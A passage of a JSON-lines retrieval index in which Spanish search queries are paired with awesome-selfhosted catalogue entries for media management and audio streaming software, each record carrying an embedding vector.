0.04397, 0.00488, -0.00877, -0.02245, -0.02886, 0.06343, -0.00327, -0.03822, 0.00064, -0.07546, -0.08935, 0.00613, -0.00172, -0.06931, 0.04204, 0.01158, 0.05307, 0.00626, 0.02844, 0.00356]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Youtarr β€” Download videos from YouTube channels on a schedule via yt-dlp, with a web UI to browse and selectively download videos. Integrates with Plex Media Server and generates NFO metadata for Jellyfin, Kodi, and Emby [⚠, ISC, Docker]. youtube-dl-nas β€” Authenticated yt-dlp download queue for video, audio and subtitles, with history, mobile sharing and NAS file management (fork of youtube-dl-server) [⚠, MIT, Python/Docker]. YoutubeDL-Server β€” Web and REST interface to Youtube-DL for downloading videos onto a server [MIT, Python/Docker]. yt-dlp Web UI β€” Web GUI for yt-dlp [MPL-2.0, Docker/Go/Nodejs].", "indexar": "quΓ© programa puedo usar para descargar videos de YouTube en segundo plano con una interfaz web", "v": [-0.03601, 0.10291, -0.15977, -0.16652, 0.00152, -0.01966, -0.03398, -0.04593, 0.00775, -0.0879, -0.09698, -0.12732, -0.0549, -0.04557, -0.13055, -0.03989, 0.13231, -0.06719, 0.11842, -0.09991, 0.07623, 0.00819, -0.12112, -0.07807, -0.08972, -0.00808, -0.03656, -0.0077, -0.04579, -0.07356, -0.05314, 0.03337, 0.00459, 0.01892, -0.13074, -0.01461, 0.10398, 0.0911, 0.01116, -0.0029, 0.00361, -0.02276, -0.12893, 0.09063, 0.01079, 0.01467, 0.03146, -0.07475, -0.05724, -0.05054, 0.07333, 0.03418, -0.08362, 0.0226, -0.02205, -0.1117, 0.12751, -0.21322, -0.06442, -0.03714, -0.02492, -0.04329, 0.06468, 0.04167, -0.00775, 0.03482, -0.03329, 0.1762, -0.04433, 0.04413, -0.01329, 0.05464, 0.02999, -0.03528, 0.10388, 0.10042, -0.06666, -0.00526, -0.02345, 0.00422, 0.0311, -0.0669, -0.00601, 0.06495, -0.08353, -0.07358, 0.01186, -0.01612, -0.00814, -0.15055, -0.01178, 0.07344, 0.04755, -0.02066, 0.00884, -0.0819, 0.07314, 0.04961, 0.03055, -0.04684, 0.03703, -0.0507, -0.07074, 0.13198, -0.02666, 0.11193, 0.11097, -0.04477, -0.13623, 0.04048, 0.02866, 0.0106, -0.07094, -0.07228, -0.08955, 0.0255, -0.04225, -0.04431, 0.02889, -0.09344, -0.00371, 0.03587, -0.10909, -0.02093, 0.05071, 0.0301, -0.02033, 0.08903, -0.06385, 0.02726, 0.02346, -0.05301, -0.01569, -0.05161, -0.02605, -0.03729, 0.0097, -0.04632, -0.06712, -0.04516, 0.05894, 0.02525, -0.04108, -0.00615, 0.07239, -0.04226, 0.06966, -0.09234, -0.10774, 0.04086, -0.01587, 0.00812, -0.02987, -0.05426, -0.04962, -0.01448, 0.00727, -0.05145, -0.06471, -0.02352, -0.02557, -0.05943, -0.04853, -0.01052, 0.00394, 0.01543, -0.0972, 0.01599, 0.03542, 0.07443, 0.02815, 0.09811, 0.03944, -0.13807, -0.00372, -0.0737, 0.02889, -0.02782, 0.05984, -0.00032, -0.09488, 0.04283, 0.04519, 0.07928, -0.08576, -0.0885, -0.06613, 0.06169, -0.04618, 0.0796, -0.05326, 0.04567, 0.01146, 0.0374, 0.03823, -0.02787, -0.05448, -0.00636, -0.00167, -0.01916, -0.05217, -0.06133, -0.04588, -0.03445, -0.00778, 0.03302, 0.00316, -0.04157, 0.01683, 0.0638, -0.01499, -0.07745, 0.03685, -0.02179, 0.01906, 0.02067, 0.05373, 0.06967, 0.08029, 0.01029, 0.01014, 0.0461, -0.00677, 0.01209, 0.02567, 0.02394, 0.00805, 0.01695, -0.04251, 0.04897, -0.10155, -0.02789, -0.04214, -0.09457, 0.03816, 0.02494, 0.00671, -0.01236, -0.01246, -0.04969, -0.01874, 0.10749, 0.01568, -0.02183, -0.03796, -0.05354, -0.0823, 0.03852, 0.06904, -0.08951, -0.05502, 0.05702, 0.06561, -0.00052, -0.0268, 0.04514]} -{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Youtarr β€” Download videos from YouTube channels on a schedule via yt-dlp, with a web UI to browse and selectively download videos. Integrates with Plex Media Server and generates NFO metadata for Jellyfin, Kodi, and Emby [⚠, ISC, Docker]. youtube-dl-nas β€” Authenticated yt-dlp download queue for video, audio and subtitles, with history, mobile sharing and NAS file management (fork of youtube-dl-server) [⚠, MIT, Python/Docker]. YoutubeDL-Server β€” Web and REST interface to Youtube-DL for downloading videos onto a server [MIT, Python/Docker]. yt-dlp Web UI β€” Web GUI for yt-dlp [MPL-2.0, Docker/Go/Nodejs].", "indexar": "con quΓ© puedo programar la descarga automΓ‘tica de videos de YouTube y organizarlos automΓ‘ticamente", "v": [0.12172, 0.17374, -0.11384, -0.11137, 0.02281, 0.01594, 0.04347, -0.0006, -0.11017, -0.10692, -0.15623, -0.1648, 0.06993, -0.06141, -0.05549, -0.01088, 0.11887, -0.10884, 0.03198, 0.02067, 0.06268, -0.01267, -0.06871, -0.07767, 0.02, -0.06978, 0.05622, 0.00489, -0.20219, -0.0636, -0.04596, 0.12866, 0.0134, -0.05428, -0.01842, 0.01689, 0.04622, 0.11591, -0.07075, 0.00871, -0.05496, 0.1032, -0.13341, 0.0858, 0.02154, 0.06595, 0.12408, -0.02681, -0.03626, -0.09248, 0.02662, 0.07905, -0.06706, -0.02948, -0.05386, -0.08261, 0.05849, -0.13584, -0.03897, -0.04929, 0.0218, 0.01955, 0.0146, 0.10046, 0.02669, 0.1324, 0.03419, 0.06843, -0.01467, 0.06882, -0.07918, 0.01785, -0.06989, 0.00786, 0.13075, 0.14235, -0.06792, 0.02922, -0.02934, 0.08697, -0.02202, -0.10788, 0.01366, 0.02989, -0.01941, -0.11344, -0.02829, -0.04396, 0.00799, -0.16573, -0.0129, 0.00675, 0.07139, 0.02811, 0.03603, -0.01394, 0.1241, 0.02299, 0.03196, -0.01091, -0.00261, -0.14233, 0.00329, 0.16666, 0.02318, 0.10986, 0.0554, -0.03558, -0.0189, -0.02362, 0.04759, 0.01304, -0.05369, -0.07397, -0.03876, -0.02436, 0.0108, -0.02787, 0.03265, 0.02237, 0.02778, 0.01228, -0.03008, -0.05073, 0.01494, 0.01714, -0.02277, 0.15731, -0.02463, 0.00663, 0.09414, -0.07119, -0.07308, -0.0173, 0.00673, 0.02344, -0.00484, -0.03401, -0.06406, -0.07942, 0.00765, 0.04258, -0.02146, -0.04332, 0.10732, -0.05328, 0.02872, -0.09845, -0.05518, 0.05361, 0.02481, 0.0373, 0.01038, -0.00872, -0.05012, 0.0412, -0.03061, -0.08394, -0.01748, 0.0031, -0.00292, -0.02993, -0.02525, -0.04587, -0.05331, 0.04345, -0.01697, -0.01637, -0.01855, 0.03591, 0.00578, 0.07633, -0.01208, -0.07111, -0.05222, -0.05324, 0.00062, -0.04704, 0.08688, -0.03336, -0.09353, 0.06298, -0.02284, 0.0109, -0.04886, -0.07142, 0.02334, -0.03967, 0.03663, 0.06488, -0.01325, 0.02379, -0.06576, -0.01606, 0.01776, -0.0424, -0.11811, -0.04335, 0.00392, 0.008, -0.06079, -0.022, 0.00297, 0.00954, -0.01034, 0.05392, -0.01924, 0.02849, 0.00059, 0.04281, -0.00037, -0.04572, 0.03149, -0.02378, -0.02035, -0.02063, 0.03314, 0.00098, 0.03197, 0.02325, 0.02246, 0.01832, 0.07162, -0.03517, -0.03103, 0.04868, 0.05758, 0.10022, 0.01801, 0.05847, -0.10131, 0.01391, -0.05159, -0.06332, 0.06184, 0.01869, 0.00928, -0.02935, -0.0483, -0.02553, -0.00583, 0.0638, -0.00225, -0.03894, -0.05556, -0.12424, -0.05756, 0.0566, 0.03139, -0.07053, -0.00676, 0.06395, 0.06142, -0.01617, -0.02139, 0.01867]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "que programa sirve para transmitir mΓΊsica por internet en casa", "v": [-0.00841, 0.08197, -0.03865, -0.14558, -0.08693, -0.13327, -0.09343, -0.05681, -0.00371, -0.06757, 0.02613, -0.07613, 0.08289, -0.07578, 0.03623, -0.02114, 0.12777, -0.01217, 0.12039, -0.01486, -0.00847, 0.07953, -0.07741, -0.10181, -0.09027, -0.01342, 0.06612, 0.01649, -0.05621, 0.09982, -0.01921, -0.04265, 0.04379, -0.03055, -0.07384, -0.0663, 0.0815, 0.12812, 0.05804, -0.03269, 0.03764, 0.00127, 0.01487, 0.01637, 0.04551, -0.05684, 0.05789, -0.07274, 0.00843, 0.00313, -0.01858, 0.0413, -0.0113, 0.01914, 0.01038, -0.12845, -0.07752, -0.23684, 0.01062, 0.00753, 0.00843, -0.06931, -0.00392, 0.00517, 0.04874, 0.0683, 0.01309, 0.03932, -0.0287, 0.02767, 0.00155, 0.05559, 0.05905, -0.0244, -0.04761, 0.02703, -0.0873, -0.07874, -0.03521, -0.1238, -0.02112, -0.02396, -0.01598, 0.04393, -0.06597, 0.03309, 0.06845, -0.08415, -0.02275, -0.04282, 0.00497, 0.10964, 0.04778, 0.02714, 0.1108, -0.09074, 0.11216, -0.02145, 0.06923, -0.05127, 0.03617, -0.01765, -0.11144, 0.06395, -0.03108, 0.0611, 0.13443, -0.04471, -0.03895, 0.03774, -0.05939, 0.06134, -0.04164, -0.01307, 0.03245, -0.07203, 0.01861, -0.04262, 0.01049, 0.03541, -0.07803, 0.05971, 0.04319, 0.02134, -0.00527, 0.00958, 0.05553, 0.00746, -0.02606, 0.08325, -0.00254, -0.07665, 0.0179, -0.04161, 0.01972, -0.05682, -0.02654, -0.13209, 0.03275, -0.03466, 0.11961, 0.06494, -0.06118, 0.00552, 0.04566, -0.00555, 0.02519, -0.03183, -0.08866, 0.0196, -0.12785, 0.15112, -0.14044, -0.03468, -0.00547, 0.04224, 0.02203, 0.00403, -0.08729, -0.0022, -0.07407, 0.03274, 0.01377, -0.09376, -0.00879, 0.07552, 0.01636, 0.16832, 0.02381, 0.05678, -0.12743, 0.03483, 0.04448, -0.08685, -0.1539, -0.03052, -0.03711, -0.05399, 0.05189, -0.00628, -0.0801, 0.01909, -0.0008, 0.01595, 0.00507, 0.05495, -0.05115, 0.00242, -0.0959, -0.06088, -0.06477, -0.07835, -0.07377, 0.11711, 0.05703, 0.01555, -0.10801, -0.00561, 0.02407, 0.03826, -0.09409, -0.11791, 0.02837, 0.01652, 0.02567, 0.04536, 0.0279, -0.05718, 0.04404, 0.09813, -0.04077, -0.08828, -0.0228, 0.042, -0.04292, 0.0297, 0.00557, -0.00414, 0.02084, 0.1288, -0.01222, -0.00126, -0.02105, 0.0071, 0.0369, 0.03863, 0.02514, -0.08593, 0.05936, -0.01239, -0.01114, -0.07071, 0.02122, 0.01565, -0.04845, -0.05484, -0.0813, -0.01486, -0.0514, -0.0026, -0.08661, 0.04149, 0.02414, 0.01385, 0.05548, -0.038, -0.03437, 0.00753, 0.04185, 0.00833, -0.04731, -0.01171, 0.01287, 0.05347, 0.05454, 0.09636]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "con que puedo montar un servidor de libros de voz y podcastes", "v": [-0.00593, -0.01154, -0.12014, -0.17059, -0.13514, -0.02134, 0.0186, -0.04825, 0.0262, -0.19026, -0.0799, -0.05202, 0.01834, 0.01308, -0.0257, 0.06425, 0.24828, 0.0075, 0.05813, 0.06713, 0.08094, -0.03137, -0.03056, -0.00892, 0.14037, 0.07358, 0.08142, 0.01051, -0.0742, 0.01678, -0.06188, -0.02929, -0.00972, 0.01476, -0.08883, -0.10721, 0.03138, 0.18513, -0.05901, 0.06805, -0.03747, 0.01917, 0.05837, -0.00484, -0.03001, -0.02757, -0.00162, -0.01862, -0.00926, 0.05408, 0.01136, -0.11727, -0.0249, 0.06308, 0.00126, 0.00498, 0.03203, -0.13271, -0.01566, -0.00213, -0.14105, 0.07397, 0.01515, -0.08643, 0.09804, 0.00206, -0.09429, 0.01584, -0.03752, 0.04829, -0.10107, -0.1105, 0.00798, -0.02525, 0.09263, 0.03785, -0.01119, -0.07503, 0.08519, 0.12375, 0.07779, -0.04332, 0.04703, 0.15116, -0.04044, 0.11654, 0.01815, -0.02624, 0.05086, 0.05066, -0.08194, 0.10495, -0.01823, 0.00969, 0.00361, -0.06519, 0.20981, 0.02897, -0.03105, -0.1002, 0.01414, 0.13572, 0.03012, 0.08214, 0.02577, 0.04982, 0.03876, -0.10862, 0.11151, 0.05121, 0.04725, 0.0727, -0.03108, 0.00961, -0.13403, -0.11898, 0.0938, -0.07619, 0.03121, 0.06871, -0.01925, 0.10187, -0.00341, 0.01187, 0.04545, -0.02021, 0.12028, 0.00675, 0.03082, -0.04481, 0.05186, -0.03874, 0.02903, -0.08542, 0.03315, -0.01674, 0.02653, 0.01274, -0.09843, 0.00748, 0.04781, 0.00292, 0.0376, -0.04601, 0.01633, -0.07424, -0.01757, -0.13287, -0.02189, -0.07435, 0.07434, 0.04607, -0.0736, -0.00761, 0.01125, -0.01601, 0.08592, -0.07297, -0.02686, 0.01161, 0.04165, 0.03625, 0.00031, -0.00458, -0.00523, -0.05233, -0.00853, 0.01473, 0.05218, -0.02989, -0.08984, 0.02275, 0.04918, -0.04289, 0.00451, 0.01931, -0.0547, -0.00144, 0.09923, -0.00103, -0.09911, -0.02898, 0.04008, -0.03499, -0.02682, 0.03101, 0.01412, -0.0546, -0.07382, -0.03179, -0.02737, 0.01861, -0.03202, 0.00679, 0.07466, -0.04072, -0.0094, 0.00923, -0.03857, -0.03476, -0.08819, -0.04649, 0.01559, 0.0181, 0.05276, -0.04487, -0.05097, 0.02389, 0.07292, 0.0833, -0.00636, -0.041, 0.0277, 0.01474, 0.01268, -0.01775, -0.06416, 0.00779, -0.01328, -0.00375, -0.00596, 0.05497, 0.09729, 0.04228, -0.00871, 0.03765, 0.03292, -0.02134, 0.0583, -0.02364, -0.05373, -0.00899, 0.00258, 0.02643, -0.04094, 0.05122, 0.02043, 0.0332, -0.08874, -0.04139, -0.02623, 0.08543, 0.03087, -0.01393, 0.01917, -0.01622, 0.00596, 0.02523, -0.01005, 0.00391, -0.0476, -0.01377, 0.01687, -0.01777, 0.01716, -0.02752]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: Ampache β€” Web based audio/video streaming application [AGPL-3.0, PHP]. Audiobookshelf β€” Audiobook and podcast server. It streams all audio formats, keeps and syncs progress across devices. Comes with open-source apps for Android and iOS [GPL-3.0, Docker/deb/Nodejs]. Audioserve β€” Simple personal server to serve audio files from directories (audiobooks, music, podcasts...). Focused on simplicity and supports sync of play position between clients [MIT, Rust]. AzuraCast β€” Modern and accessible web radio management suite [Apache-2.0, Docker]. Beets β€” Music library manager and MusicBrainz tagger (command-line and Web interface) [MIT, Python/deb]. Black Candy β€” Music streaming server [MIT, Docker/Ruby]. BotWave β€” FM broadcasting system with server-client architecture for managing multiple Raspberry Pi transmitters remotely [GPL-3.0, Python]. Funkwhale β€” Modern, web-based, convivial, multi-user and free music server [BSD-3-Clause, Python]. gonic β€” Lightweight music streaming server. Subsonic compatible [GPL-3.0, Go/Docker].", "indexar": "cual es una alternativa libre a Subsonic para reproducir mi biblioteca de audio", "v": [0.01718, 0.07199, -0.09952, -0.06636, -0.05875, -0.10388, -0.16647, -0.03198, -0.12896, -0.0808, -0.0424, -0.16583, 0.00365, 0.09817, 0.07668, -0.13053, 0.02425, -0.05825, 0.10722, 0.0244, 0.1083, 0.1225, -0.08282, 0.00498, 0.14302, -0.08583, 0.05618, 0.02187, -0.04991, 0.09932, 0.03209, 0.06579, 0.0638, -0.07787, -0.12988, 0.02751, 0.10048, 0.09521, 0.03832, -0.02127, -0.01177, 0.00834, -0.04586, 0.07743, -0.08738, -0.05903, 0.02339, 0.04296, -0.08011, 0.10722, -0.04778, 0.00697, -0.02926, 0.05427, 0.09023, -0.05838, 0.02893, -0.12415, -0.03778, -0.11288, -0.05486, -0.0097, 0.04506, -0.14529, 0.09309, 0.02261, -0.03937, -0.03685, -0.03485, 0.10943, -0.05173, -0.01841, 0.0416, -0.00343, -0.12957, 0.07981, -0.08618, -0.17402, 0.07377, -0.00523, 0.03006, -0.08783, 0.03375, 0.01498, -0.04991, 0.0792, 0.08497, -0.07035, 0.06144, 0.08316, -0.0801, -0.0438, -0.015, 0.03821, 0.09412, -0.1559, 0.05675, 0.02581, -0.07328, 0.06317, 0.03924, 0.06488, -0.06661, 0.04122, 0.0018, -0.00396, -0.052, -0.0841, 0.00325, -0.04518, 0.05475, 0.03774, 0.00867, -0.00047, -0.04401, -0.03941, 0.01502, 0.00786, 0.12449, 0.10147, -0.07667, 0.07718, -0.08662, -0.11105, -0.00223, 0.05748, 0.11352, -0.06493, -0.00857, 0.03746, 0.06602, -0.00192, -0.04969, -0.11634, -0.09056, 0.00949, 0.0466, -0.10083, 0.00622, 0.00558, 0.05731, -0.03783, -0.05961, -0.01178, -0.00188, -0.09447, 0.04792, -0.00505, -5e-05, -0.05566, -0.07341, -0.01075, 0.00889, 0.04605, -0.02259, 0.10925, 0.0888, -0.05286, -0.07187, 0.03531, 0.01791, -0.00042, 0.06677, -0.07, -0.06576, -0.03141, -0.00654, -0.03529, 0.00401, -0.04574, -0.10988, -0.01708, 0.05973, -0.08029, -0.02194, -0.11349, 0.00439, -0.03654, 0.11575, 0.04892, -0.00047, 0.01863, -0.06348, -0.03625, -0.02982, -0.07298, -0.0099, -0.05628, -0.06691, -0.04393, -0.0301, -0.02708, -0.04519, -0.01026, 0.03804, 0.01336, -0.02542, 0.00208, -0.05419, -0.00042, -0.03525, -0.00037, 0.0036, 0.01622, 0.06556, -0.02632, -0.00905, 0.02247, -0.04081, 0.02143, 0.01957, 0.0654, 0.07822, 0.04495, -0.10094, -0.01261, -0.05067, 0.00888, 0.00953, -0.07903, 0.04657, 0.01726, 0.09432, 0.03464, -0.01334, -0.03024, -0.00238, -0.0115, 0.02632, 0.02176, 0.00401, 0.00446, 0.01056, 0.0447, -0.00207, -0.00663, -0.0246, 0.06247, -0.00726, -0.01064, 0.01005, 0.05927, -0.04285, -0.01174, 0.0154, -0.01941, -0.06338, 0.01429, -0.0138, -0.03375, -0.01601, 0.036, 0.02734, -0.02189, 0.05779, -0.02645]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "que servidor de mΓΊsica puedo usar para transmitir audio por la web?", "v": [-0.01917, 0.09359, -0.13038, -0.1847, -0.13339, -0.08696, -0.12517, -0.0839, 0.03949, -0.05277, -0.10753, -0.06546, 0.02427, -0.01911, 0.00946, -0.03508, 0.21054, -0.03559, 0.04328, 0.01134, 0.08412, 0.01517, -0.08706, -0.07251, -0.06666, 0.05768, 0.09043, -0.04927, -0.08674, 0.01807, -0.02854, -0.02627, 0.05593, -0.01355, -0.08804, -0.05837, 0.0189, 0.1868, 0.00674, 0.07141, -0.01893, -0.03024, -0.0077, 0.0266, -0.00285, -0.04898, 0.04895, -0.09718, 0.00102, 0.03953, 0.01683, -0.00232, -0.14162, 0.01322, -0.02017, -0.09388, 0.02451, -0.20424, 0.03291, -0.06688, -0.05285, -0.01406, -0.06921, -0.01617, 0.06999, 0.04263, -0.00462, -0.00345, -0.05515, 0.02067, -0.07738, 0.02467, 0.06586, 0.02511, 0.06811, 0.0758, -0.09489, -0.10088, 0.01796, -0.01141, 0.00743, -0.01004, 0.00455, 0.05248, -0.14167, 0.04199, 0.11747, -0.02355, 0.027, 0.01975, 0.00083, 0.075, -0.00874, -0.05265, 0.06097, -0.11756, 0.05839, -0.05102, 0.02418, -0.09661, 0.05125, 0.04877, -0.02258, -0.00686, 0.063, 0.07687, 0.13868, -0.15695, 0.11128, 0.01962, -0.06391, 0.01549, -0.05096, -0.03129, -0.00972, -0.08412, 0.05004, -0.03471, 0.02974, 0.10802, -0.03784, 0.04636, 0.01971, 0.02283, -0.00296, -0.01855, 0.06088, -0.01519, -0.01769, 0.0013, 0.01198, -0.08441, 0.00092, -0.05855, 0.03164, -0.01319, 0.04057, -0.07439, 0.00627, 0.02365, 0.07479, 0.06532, -0.09966, 0.01453, 0.10132, -0.01275, 0.04117, -0.07269, -0.06813, -0.03879, -0.03196, 0.04641, -0.14399, -0.08721, -0.07552, 0.0317, 0.09618, -0.06272, -0.07275, -0.00614, -0.02635, 0.06238, 0.02917, 0.04341, 0.02682, -0.03303, 0.01152, 0.10789, 0.01802, -0.01907, -0.07495, 0.00997, 0.06983, -0.09122, -0.09624, -0.04567, -0.11816, -0.06388, 0.11709, 0.00572, -0.03129, -0.00097, -0.04513, 0.00743, 0.01738, 0.0055, -0.02763, -0.04455, -0.11609, -0.00482, -0.01722, -0.00336, -0.03378, 0.09243, 0.11309, -0.00773, -0.07107, -0.04217, -0.12754, 0.02777, -0.06356, -0.09138, -0.03051, -0.07062, 0.05582, -0.0352, -0.03388, 0.01218, 0.03953, 0.04218, 0.01101, -0.06712, 0.02076, 0.01424, -0.03246, 0.05453, 0.02986, -0.00793, -0.0321, 0.01614, -0.01216, 0.06166, 0.04298, -0.00889, 0.03562, 0.06597, 0.01182, -0.06399, 0.08085, -0.01232, -0.02697, 0.04741, -0.02202, 0.00531, -0.04445, -0.00206, -0.0719, -0.00583, -0.08531, -0.02315, -0.02045, 0.07367, -0.02466, -0.00992, 0.02651, -0.07115, -0.02216, 0.00729, -0.02476, -0.04071, 0.00845, -0.02892, 0.02942, 0.01297, 0.03136, 0.03422]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "cual es una alternativa libre y open source a Logitech Media Server?", "v": [-0.16227, 0.03966, -0.1045, -0.11009, -0.11802, -0.14358, -0.06573, -0.0515, -0.15538, -0.08016, -0.13462, -0.17705, 0.00073, 0.03363, 0.12351, 0.02058, 0.08332, -0.17774, -0.02579, -0.08321, -0.02496, 0.04467, -0.132, -0.18234, 0.10517, -0.07535, 0.13322, -0.11244, -0.06923, 0.02031, -0.0699, 0.01169, 0.04491, 0.07127, -0.02759, 0.06387, 0.11868, 0.10046, 0.08961, -0.00884, -0.01836, -0.11468, -0.04004, 0.03873, 0.16037, -0.08367, -0.00106, 0.0256, -0.02663, -0.00645, -0.01957, -0.06714, -0.05543, 0.01512, 0.03342, 0.02876, 0.08751, -0.11207, -0.04178, 0.02576, -0.11932, 0.04312, -0.00917, -0.07083, -0.01829, 0.07809, -0.04613, -0.02998, -0.10276, 0.07439, -0.08189, -0.04316, 0.05765, -0.04084, -0.07658, 0.07124, -0.11455, -0.02629, 0.06104, 0.09333, 0.0423, -0.08082, 0.00824, -0.01267, -0.051, -0.12501, 0.11272, -0.02458, -0.06162, 0.03663, 0.05639, 0.10662, -0.01823, 0.13377, 0.03547, -0.06692, 0.05423, 0.01177, -0.00246, 5e-05, -0.00803, -0.02121, -0.05109, -0.03006, 0.00959, -0.05715, 0.03313, -0.06905, -0.10357, -0.00081, 0.03997, 0.10477, 0.03051, 0.05912, -0.0968, -0.03256, -0.00245, 0.02036, 0.03451, 0.06046, -0.00235, -0.07527, -0.00462, -0.0306, -0.01847, 0.00608, 0.05069, -0.00786, -0.04755, 0.03862, 0.0047, -0.03738, 0.01214, -0.05926, -0.06212, -0.10976, 0.09083, -0.04029, -0.00095, 0.02176, 0.00454, 0.03465, 0.02731, -0.03304, 0.11401, -0.03479, 0.06947, -0.03537, -0.0729, -0.01454, -0.01311, 0.0134, -0.04424, 0.04398, -0.09401, -0.01814, -0.04255, -0.06205, -0.08406, 0.07844, 0.00193, 0.02517, -0.02772, 0.02927, -0.00916, -0.01845, -0.02821, -0.08626, -0.03608, 0.02682, -0.03299, 0.10432, 0.03796, -0.05649, 0.02868, -0.10364, -0.02897, -0.1073, 0.03878, -0.04189, 0.00656, 0.0064, -0.04668, 0.01579, 0.02423, 0.01481, -0.01157, -0.06562, 0.02399, 0.0363, -0.01399, 0.02234, -0.11622, -0.08011, 0.07495, -0.03922, -0.00703, -0.06689, 0.00095, 0.04073, -0.06441, 0.05053, -0.02264, 0.0039, -0.01701, 0.05979, 0.00274, 0.002, -0.02647, 0.06715, 0.02131, 0.00958, 0.10257, 0.00447, -0.04418, -0.00254, 0.02692, -0.0284, 0.01489, -0.00779, 0.01043, 0.07543, -0.04475, -0.04164, -0.02973, 0.0114, 0.05262, 0.05448, 0.01465, -0.02435, -0.03353, -0.01968, -0.03867, 0.01939, -0.00582, -0.00237, 0.023, 0.0311, 0.03918, -0.01862, 0.00668, 0.04035, -0.03147, -0.03113, -0.00971, -0.05244, -0.09499, 0.00231, 